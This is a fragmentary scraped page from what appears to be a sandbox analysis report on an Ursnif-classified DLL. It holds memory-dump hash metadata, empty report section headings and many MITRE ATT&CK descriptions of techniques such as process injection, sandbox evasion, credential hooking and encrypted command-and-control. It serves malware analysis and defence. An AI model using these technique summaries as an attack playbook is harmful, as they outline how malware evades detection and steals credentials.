Function 000001DA1B0E0FC1, Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000003.561176592.000001DA1B0E0000.00000010.00000001.sdmp, Offset: 000001DA1B0E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 60c6eb634d9ae9ad8427663c0dd28040681f0022e7685ed6e3a404e00b11a04c
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: C69004144D540755D414D1D11C477DC504077CD350FD44CC1C417D4544F44D03F71153

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report u8xtCk7fq8.dll

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre